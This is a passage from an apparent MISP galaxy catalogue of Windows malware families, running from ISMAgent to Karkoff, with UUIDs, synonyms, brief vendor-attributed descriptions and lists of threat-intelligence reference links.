- https://journal.cecyf.fr/ojs/index.php/cybin/article/view/15 - webarchive
- https://isc.sans.edu/forums/diary/German+language+malspam+pushes+Ursnif/25732/ - webarchive
- https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/ - webarchive
- https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf - webarchive
- https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/ - webarchive
- https://medium.com/walmartglobaltech/signed-dll-campaigns-as-a-service-7760ac676489 - webarchive
- https://0ffset.net/reverse-engineering/malware-analysis/analysing-isfb-loader/ - webarchive
- https://blog.morphisec.com/obfuscated-vbscript-drops-zloader-ursnif-qakbot-dridex - webarchive
- https://threatresearch.ext.hp.com/detecting-ta551-domains/ - webarchive
- https://blog.talosintelligence.com/2020/07/valak-emerges.html - webarchive
- https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145 - webarchive
- https://securityintelligence.com/meet-goznym-the-banking-malware-offspring-of-gozi-isfb-and-nymaim/ - webarchive
- https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/ - webarchive
- https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/ - webarchive
- https://www.zdnet.com/article/ursnif-trojan-has-targeted-over-100-italian-banks/ - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf - webarchive
- https://github.com/mlodic/ursnif_beacon_decryptor - webarchive
- https://www.tgsoft.it/files/report/download.asp?id=7481257469 - webarchive
- https://0xtoxin.github.io/threat%20breakdown/Gozi-Italy-Campaign/ - webarchive
- https://arielkoren.com/blog/2016/11/01/ursnif-malware-deep-technical-dive/ - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf - webarchive
- https://www.darktrace.com/en/blog/the-resurgence-of-the-ursnif-banking-trojan/ - webarchive
- https://blog.qualys.com/vulnerabilities-threat-research/2022/05/08/ursnif-malware-banks-on-news-events-for-phishing-attacks - webarchive
- https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_5_sajo-takeda-niwa_en.pdf - webarchive
- https://www.justice.gov/opa/pr/officials-announce-international-operation-targeting-transnational-criminal-organization - webarchive
- https://lokalhost.pl/gozi_tree.txt - webarchive
- https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf - webarchive
- https://0ffset.net/reverse-engineering/malware-analysis/analyzing-isfb-second-loader/ - webarchive
- https://blog.group-ib.com/gozi-latest-ttps - webarchive
- https://securityintelligence.com/posts/ursnif-cerberus-android-malware-bank-transfers-italy/ - webarchive
- https://www.bridewell.com/insights/news/detail/hunting-for-ursnif - webarchive
- https://www.tgsoft.it/files/report/download.asp?id=568531345 - webarchive
- https://blog.talosintelligence.com/2019/01/amp-tracks-ursnif.html - webarchive
- https://kostas-ts.medium.com/ursnif-vs-italy-il-pdf-del-destino-5c83d6281072 - webarchive
- https://www.youtube.com/watch?v=KvOpNznu_3w - webarchive
- http://benkow.cc/DreambotSAS19.pdf - webarchive
- https://blog.talosintelligence.com/2020/09/salfram-robbing-place-without-removing.html - webarchive
- https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update - webarchive
- https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much - webarchive
- https://www.proofpoint.com/us/blog/security-briefs/ta544-targets-italian-organizations-ursnif-malware - webarchive
- https://intel471.com/blog/ettersilent-maldoc-builder-macro-trickbot-qbot/ - webarchive
- https://www.cyberbit.com/new-ursnif-malware-variant/ - webarchive
- https://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/ - webarchive
- https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/ - webarchive
- https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf - webarchive
- https://unit42.paloaltonetworks.com/wireshark-tutorial-examining-ursnif-infections/ - webarchive
- https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-batloader - webarchive
- https://www.cleafy.com/cleafy-labs/digital-banking-fraud-how-the-gozi-malware-work - webarchive
- https://www.cylance.com/en_us/blog/threat-spotlight-ursnif-infostealer-malware.html - webarchive
- https://blog.morphisec.com/ursnif/gozi-delivery-excel-macro-4.0-utilization-uptick-ocr-bypass - webarchive
- https://research.nccgroup.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/ - webarchive
- https://www.mcafee.com/blogs/other-blogs/mcafee-labs/phishing-campaigns-featuring-ursnif-trojan/ - webarchive
- https://blog.fox-it.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/ - webarchive
- https://www.esentire.com/blog/batloader-continues-to-abuse-google-search-ads-to-deliver-vidar-stealer-and-ursnif - webarchive
- https://medium.com/csis-techblog/chapter-1-from-gozi-to-isfb-the-history-of-a-mythical-malware-family-82e592577fef - webarchive
- https://blog.yoroi.company/research/ursnif-the-latest-evolution-of-the-most-popular-banking-malware/ - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf - webarchive
- https://0xc0decafe.com/malware-analysts-guide-to-aplib-decompression/ - webarchive
- https://blog.yoroi.company/research/ursnif-long-live-the-steganography/ - webarchive
- https://securityintelligence.com/posts/itg23-crypters-cooperation-between-cybercriminal-groups/ - webarchive
- https://github.com/gbrindisi/malware/tree/master/windows/gozi-isfb - webarchive
- https://www.fortinet.com/blog/threat-research/ursnif-variant-spreading-word-document.html - webarchive
- https://www.fortinet.com/blog/threat-research/new-variant-of-ursnif-continuously-targeting-italy - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ISMAgent
Internal MISP references
UUID 67457708-1edd-4ef1-9ec0-1c5eb7c75fe2
which can be used as unique global reference for ISMAgent
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.ismagent - webarchive
- http://www.clearskysec.com/ismagent/ - webarchive
- https://unit42.paloaltonetworks.com/atoms/evasive-serpens/ - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia - webarchive
- https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae - webarchive
- https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ISMDoor
Internal MISP references
UUID e09d8dd6-6857-4607-a0ba-9c8d2a66083b
which can be used as unique global reference for ISMDoor
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.ismdoor - webarchive
- http://www.clearskysec.com/greenbug/ - webarchive
- https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon - webarchive
- https://web.archive.org/web/20190331181353/https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon - webarchive
- https://unit42.paloaltonetworks.com/atoms/evasive-serpens/ - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
iSpy Keylogger
Internal MISP references
UUID 8c95cb51-1044-4dcd-9cac-ad9f2e3b9070
which can be used as unique global reference for iSpy Keylogger
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
IsraBye
Internal MISP references
UUID c5cec575-325c-44b8-af24-4feb330eec8a
which can be used as unique global reference for IsraBye
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ISR Stealer
ISR Stealer is a modified version of the Hackhound Stealer. It is written in VB and often comes in a .NET wrapper. ISR Stealer makes use of two Nirsoft tools: Mail PassView and WebBrowserPassView.
Incredibly, it uses a hard-coded user agent string: HardCore Software For : Public
Internal MISP references
UUID 27bab2fb-d324-42c2-9df3-669bb87c3989
which can be used as unique global reference for ISR Stealer
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
IsSpace
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular IsSpace.
Known Synonyms |
---|
NfLog RAT |
Internal MISP references
UUID a3f41c96-a5c8-4dfe-b7fa-d9d75f97979a
which can be used as unique global reference for IsSpace
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.isspace - webarchive
- http://researchcenter.paloaltonetworks.com/2017/01/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/ - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-overbrook - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-express - webarchive
- http://csecybsec.com/download/zlab/20180713_CSE_APT28_X-Agent_Op-Roman%20Holiday-Report_v6_1.pdf - webarchive
- https://wikileaks.org/vault7/document/2015-09-20150911-280-CSIT-15085-NfLog/2015-09-20150911-280-CSIT-15085-NfLog.pdf - webarchive
- https://unit42.paloaltonetworks.com/atoms/shallowtaurus/ - webarchive
- https://unit42.paloaltonetworks.com/watering-hole-attack-on-aerospace-firm-exploits-cve-2015-5122-to-install-isspace-backdoor/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
IXWare
Internal MISP references
UUID 5710dffa-ec02-4e5c-848e-47af13f729d7
which can be used as unique global reference for IXWare
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Jackal
According to Kaspersky Labs, this malware tool set has been used by the APT group GoldenJackal, which has been observed since 2019 and which usually targets government and diplomatic entities in the Middle East and South Asia for espionage. It consists of multiple components and is written in .NET.
Internal MISP references
UUID 5f601f0a-13f7-40b5-9cf1-2eb50d5bad64
which can be used as unique global reference for Jackal
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
JackPOS
Internal MISP references
UUID 3acb37f4-5614-4932-b12f-9f1c256895f2
which can be used as unique global reference for JackPOS
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Jaff
Internal MISP references
UUID 2c51a717-726b-4813-9fcc-1265694b128e
which can be used as unique global reference for Jaff
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.jaff - webarchive
- http://malware-traffic-analysis.net/2017/05/16/index.html - webarchive
- https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/ - webarchive
- https://www.proofpoint.com/us/threat-insight/post/jaff-new-ransomware-from-actors-behind-distribution-of-dridex-locky-bart - webarchive
- https://intel471.com/blog/a-brief-history-of-ta505 - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf - webarchive
- https://clairelevin.github.io/malware/2023/02/14/jaff.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Jager Decryptor
Internal MISP references
UUID 13a7a2ff-c945-4b42-a112-dcf09f9ed9c9
which can be used as unique global reference for Jager Decryptor
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Jaku
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Jaku.
Known Synonyms |
---|
C3PRO-RACOON |
EQUINOX |
KCNA Infostealer |
Reconcyc |
Internal MISP references
UUID 0f02ea79-5833-46e0-8458-c4a863a5a112
which can be used as unique global reference for Jaku
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.jaku - webarchive
- https://www.brighttalk.com/webcast/7451/538775 - webarchive
- https://securelist.com/whos-really-spreading-through-the-bright-star/68978/ - webarchive
- https://www.forcepoint.com/sites/default/files/resources/files/report_jaku_analysis_of_botnet_campaign_en_0.pdf - webarchive
- https://www-01.ibm.com/support/docview.wss?uid=ssg1S1010146 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
JanelaRAT
According to Zscaler, JanelaRAT is a heavily modified variant of BX RAT. It focuses on harvesting LATAM financial data, and its method of extracting window titles for transmission underscores its targeted and stealthy nature. With an adaptive approach that uses dynamic socket configuration and exploits DLL side-loading from trusted sources, JanelaRAT poses a significant threat.
Internal MISP references
UUID d8455b0c-1d0b-4857-8e6a-abc6892cf7b9
which can be used as unique global reference for JanelaRAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Janeleiro
Internal MISP references
UUID 2ebce129-d59e-401c-9259-9009d9b2d50f
which can be used as unique global reference for Janeleiro
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
jason
Jason is a graphical tool implemented to perform Microsoft Exchange account brute-forcing in order to "harvest" as many e-mail addresses and account details as possible. It is distributed in a ZIP container, and the interface is quite intuitive: the Microsoft Exchange address and its version must be provided. Three brute-force methods can be selected: EWS (Exchange Web Service), OAB (Offline Address Book) or both (All). Username and password lists can be selected, and the number of threads must be provided in order to balance the attack load.
Internal MISP references
UUID e101a605-c30f-4222-9549-4745d0d769cd
which can be used as unique global reference for jason
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.jason - webarchive
- https://twitter.com/P3pperP0tts/status/1135503765287657472 - webarchive
- https://www.secureworks.com/research/threat-profiles/cobalt-gypsy - webarchive
- https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf - webarchive
- https://marcoramilli.com/2019/06/06/apt34-jason-project/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Jasus
Internal MISP references
UUID af6e89ec-0adb-4ce6-b4e6-610827e722ea
which can be used as unique global reference for Jasus
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
JCry
Ransomware written in Go.
Internal MISP references
UUID fea703ec-9b24-4119-96b3-7ae6bec3b203
which can be used as unique global reference for JCry
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Jeno
Ransomware.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Jeno.
Known Synonyms |
---|
Jest |
Valeria |
Internal MISP references
UUID a1d7e117-4ca9-4d67-a4dd-53626827ed2f
which can be used as unique global reference for Jeno
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
JessieConTea
JessieConTea is a remote access trojan that uses HTTP(S) for communication. It supports around 30 commands that include operations on the victim’s filesystem, basic process management, file exfiltration (both plain and zipped), and the download and execution of additional tools from the attacker’s arsenal. The commands are indexed by 32-bit integers, starting with the value 0x60D49D97.
The malware was delivered in the wild via trojanized applications such as DeFi Wallet or Citrix Workspace.
JessieConTea generates POST parameters with a specific parameter name, jsessid, from which the initial part of its name is derived. Also, it contains a specific RTTI symbol ".?AVCHttpConn@@", which inspired the second part of the name. It uses RC4 for C&C traffic encryption.
Internal MISP references
UUID 8f286f97-30c8-4281-887b-9cbede9f1e1e
which can be used as unique global reference for JessieConTea
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.jessiecontea - webarchive
- https://cn.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.102_ENG%20(4).pdf - webarchive
- https://blog.talosintelligence.com/2019/01/fake-korean-job-posting.html - webarchive
- https://securelist.com/lazarus-trojanized-defi-app/106195/ - webarchive
- https://asec.ahnlab.com/en/57685/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
JhoneRAT
Cisco Talos identified JhoneRAT in January 2020. The RAT is delivered through cloud services (Google Drive) and also submits stolen data to them (Google Drive, Twitter, ImgBB, GoogleForms). The actors using JhoneRAT target Saudi Arabia, Iraq, Egypt, Libya, Algeria, Morocco, Tunisia, Oman, Yemen, Syria, UAE, Kuwait, Bahrain and Lebanon.
Internal MISP references
UUID 6dd8c953-f500-46dd-bacf-78772222f011
which can be used as unique global reference for JhoneRAT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.jhone_rat - webarchive
- https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf - webarchive
- https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html - webarchive
- https://blog.talosintelligence.com/2020/01/jhonerat.html - webarchive
- https://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Jigsaw
According to PCrisk, Jigsaw is ransomware that uses the AES algorithm to encrypt various files stored on computers. Targeted files include .jpg, .docx, .mp3, .mp4, and many others.
Internal MISP references
UUID 910c3fd2-56e5-4f1d-8df0-2aa0b293b7d9
which can be used as unique global reference for Jigsaw
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Jimmy
Internal MISP references
UUID 551b568f-68fa-4483-a10c-a6452ae6289e
which can be used as unique global reference for Jimmy
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
JinxLoader
Internal MISP references
UUID 76e3447a-124a-4eb1-8968-fbe0818b280a
which can be used as unique global reference for JinxLoader
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
JLORAT
Internal MISP references
UUID 8d3ed9af-c136-47a4-a0d2-50c8248435a4
which can be used as unique global reference for JLORAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Joanap
Internal MISP references
UUID bbbef449-2fe6-4c25-a85c-69af9fa6208b
which can be used as unique global reference for Joanap
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.joanap - webarchive
- https://www.us-cert.gov/ncas/alerts/TA18-149A - webarchive
- https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5b9850b9-0fdd-48a9-b595-9234207ae7df&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments - webarchive
- https://www.secureworks.com/research/threat-profiles/nickel-academy - webarchive
- https://www.acalvio.com/lateral-movement-technique-employed-by-hidden-cobra/ - webarchive
- https://app.box.com/s/xyyord0b806e6or2nh92coxw2areyyx4 - webarchive
- https://www.us-cert.gov/ncas/analysis-reports/AR18-149A - webarchive
- https://www.symantec.com/connect/blogs/attackers-target-dozens-global-banks-new-malware - webarchive
- https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf - webarchive
- https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Joao
Internal MISP references
UUID 8201c8d2-1dab-4473-bbdf-42952b3d5fc6
which can be used as unique global reference for Joao
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
win.JobCrypter
Internal MISP references
UUID 30c047ea-27c9-4b01-8532-bcaa661be85f
which can be used as unique global reference for win.JobCrypter
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Jolob
Internal MISP references
UUID 97f12ca8-dc84-4a8c-b4c6-8ec1d1e79631
which can be used as unique global reference for Jolob
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
JQJSNICKER
Internal MISP references
UUID 2e457b93-de45-4b1d-8e1d-b8d19c2c555a
which can be used as unique global reference for JQJSNICKER
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
JripBot
Internal MISP references
UUID e895a0d2-fe4b-4793-9440-9db2d56a97f2
which can be used as unique global reference for JripBot
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.jripbot - webarchive
- https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2017/10/20114955/Bartholomew-GuerreroSaade-VB2016.pdf - webarchive
- https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
JSOutProx
JSOutProx is a sophisticated attack framework built using both JavaScript and .NET. It uses the .NET (de)serialization feature to interact with a JavaScript file, which is the core module running on a victim machine. Once the malware is run on the victim machine, the framework can load several plugins that perform additional malicious activities on the target.
Internal MISP references
UUID 5e4fbe90-c043-4ac3-9fd5-d9e7d9bb173f
which can be used as unique global reference for JSOutProx
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.jsoutprox - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf - webarchive
- https://blogs.quickheal.com/multi-staged-jsoutprox-rat-targets-indian-cooperative-banks-and-finance-companies/ - webarchive
- https://twitter.com/zlab_team/status/1208022180241530882 - webarchive
- https://blog.yoroi.company/research/unveiling-jsoutprox-a-new-enterprise-grade-implant/ - webarchive
- https://www.seqrite.com/documents/en/white-papers/whitepaper-multi-staged-jsoutprox-rat-target-indian-co-operative-banks-and-finance-companies.pdf - webarchive
- https://www.fortinet.com/blog/threat-research/adversary-playbook-javascript-rat-looking-for-that-government-cheese - webarchive
- https://www.zscaler.com/blogs/research/targeted-attacks-indian-government-and-financial-institutions-using-jsoutprox-rat - webarchive
- https://yoroi.company/research/financial-institutions-in-the-sight-of-new-jsoutprox-attack-waves/ - webarchive
- https://www.resecurity.com/blog/article/the-new-version-of-jsoutprox-is-attacking-financial-institutions-in-apac-and-mena-via-gitlab-abuse - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
JSSLoader
Internal MISP references
UUID 5db89188-568d-40d2-9320-5fb4a06fbd51
which can be used as unique global reference for JSSLoader
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.jssloader - webarchive
- https://blog.morphisec.com/vmware-identity-manager-attack-backdoor - webarchive
- https://malwarebytes.app.box.com/s/ym6r7o5hq0rx2nxjbctfv2sw5vx386ni - webarchive
- https://blog.morphisec.com/new-jssloader-trojan-delivered-through-xll-files - webarchive
- https://www.microsoft.com/en-us/security/blog/2023/09/12/malware-distributor-storm-0324-facilitates-ransomware-access/ - webarchive
- https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself - webarchive
- https://www.bleepingcomputer.com/news/security/malicious-microsoft-excel-add-ins-used-to-deliver-rat-malware/ - webarchive
- https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/ - webarchive
- https://www.secureworks.com/blog/excel-add-ins-deliver-jssloader-malware - webarchive
- https://www.morphisec.com/hubfs/eBooks_and_Whitepapers/FIN7%20JSSLOADER%20FINAL%20WEB.pdf - webarchive
- https://www.malwarebytes.com/blog/threat-intelligence/2022/08/jssloader-the-shellcode-edition - webarchive
- https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-2/ - webarchive
- https://www.mandiant.com/resources/evolution-of-fin7 - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/jssloader-recoded-and-reloaded - webarchive
- https://www.splunk.com/en_us/blog/security/fin7-tools-resurface-in-the-field-splinter-or-copycat.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
JuicyPotato
As described on the GitHub repository page, "A sugared version of RottenPotatoNG, with a bit of juice, i.e. another Local Privilege Escalation tool, from a Windows Service Accounts to NT AUTHORITY\SYSTEM".
Internal MISP references
UUID 4dc0dccf-ac68-4464-b193-6519ffe00617
which can be used as unique global reference for JuicyPotato
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.juicy_potato - webarchive
- https://www.welivesecurity.com/2021/08/09/iispy-complex-server-side-backdoor-antiforensic-features/ - webarchive
- https://github.com/ohpe/juicy-potato - webarchive
- https://unit42.paloaltonetworks.com/operation-diplomatic-specter/ - webarchive
- https://lifars.com/wp-content/uploads/2020/06/Cryptocurrency-Miners-XMRig-Based-CoinMiner-by-Blue-Mockingbird-Group.pdf - webarchive
- https://www.sentinelone.com/blog/bluesky-ransomware-ad-lateral-movement-evasion-and-fast-encryption-puts-threat-on-the-radar/ - webarchive
- https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
JUMPALL
According to FireEye, JUMPALL is a malware dropper that has been observed dropping HIGHNOON/ZXSHELL/SOGU.
Internal MISP references
UUID a08db33d-4c37-4075-bd49-c3ab66a339db
which can be used as unique global reference for JUMPALL
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Jupiter
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Jupiter.
Known Synonyms |
---|
EarlyRAT |
Internal MISP references
UUID 47baaed8-073c-4a13-92dc-434210ea3cd0
which can be used as unique global reference for Jupiter
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
KAgent
Internal MISP references
UUID eab42a8e-22e7-49e4-8a26-44f14b6f67bb
which can be used as unique global reference for KAgent
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Kami
A Telegram bot with browser stealing capabilities, written using the .NET framework.
Internal MISP references
UUID d78ade16-d038-44b6-adfa-2439dcaf4d87
which can be used as unique global reference for Kami
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Kapeka
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Kapeka.
Known Synonyms |
---|
ICYWELL |
KNUCKLETOUCH |
QUEUESEED |
WRONGSENS |
Internal MISP references
UUID f1a916da-ae8f-4a09-94cf-b93b6443d421
which can be used as unique global reference for Kapeka
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.kapeka - webarchive
- https://cert.gov.ua/article/6278706 - webarchive
- https://www.ctfiot.com/183017.html - webarchive
- https://threatmon.io/understanding-the-kapeka-backdoor-detailed-analysis-by-apt44/ - webarchive
- https://labs.withsecure.com/content/dam/labs/docs/WithSecure-Research-Kapeka.pdf - webarchive
- https://threatmon.io/storage/understanding-the-kapeka-backdoor-detailed-analysis-by-apt44.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Karagany
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Karagany.
Known Synonyms |
---|
Karagny |
Internal MISP references
UUID 857e61fe-ccb2-426b-ad7b-696112f48dbb
which can be used as unique global reference for Karagany
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.karagany - webarchive
- https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2014/Dragonfly_Threat_Against_Western_Energy_Suppliers.pdf - webarchive
- https://www.secureworks.com/research/updated-karagany-malware-targets-energy-sector - webarchive
- https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group - webarchive
- https://symantec-blogs.broadcom.com/blogs/threat-intelligence/dragonfly-energy-sector-cyber-attacks - webarchive
- https://vblocalhost.com/uploads/VB2021-Slowik.pdf - webarchive
- https://www.secureworks.com/research/threat-profiles/iron-liberty - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Kardon Loader
According to ASERT, Kardon Loader is a fully featured downloader, enabling the download and installation of other malware, e.g. banking trojans, credential theft tools, etc. This malware has been on sale by an actor under the username Yattaze, starting in late April. The actor offers the sale of the malware as a standalone build with charges for each additional rebuild, or the ability to set up a botshop, in which case any customer can establish their own operation and further sell access to a new customer base.
Internal MISP references
UUID 8b33ba21-9af7-4536-bd02-23dd863147e8
which can be used as unique global reference for Kardon Loader
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Karius
According to Check Point, Karius is a banking trojan in development, borrowing code from Ramnit, Vawtrak as well as Trickbot, currently implementing webinject attacks only.
It comes with an injector that loads an intermediate "proxy" component, which in turn loads the actual banker component.
Communication with the C2 is in JSON format and encrypted with RC4 using a hardcoded key.
In the initial version, observed in March 2018, the webinjects were hardcoded in the binary, while in subsequent versions they were received from the C2.
Internal MISP references
UUID 8a01c3be-17b7-4e5a-b0b2-6c1f5ccb82cf
which can be used as unique global reference for Karius
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.karius - webarchive
- https://securityintelligence.com/posts/from-ramnit-to-bumblebee-via-neverquest - webarchive
- https://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/ - webarchive
- https://research.checkpoint.com/banking-trojans-development/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Karkoff
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Karkoff.
Known Synonyms |
---|
CACTUSPIPE |
MailDropper |
OILYFACE |
Internal MISP references
UUID a45c16d9-6945-428c-af46-0436903f9329
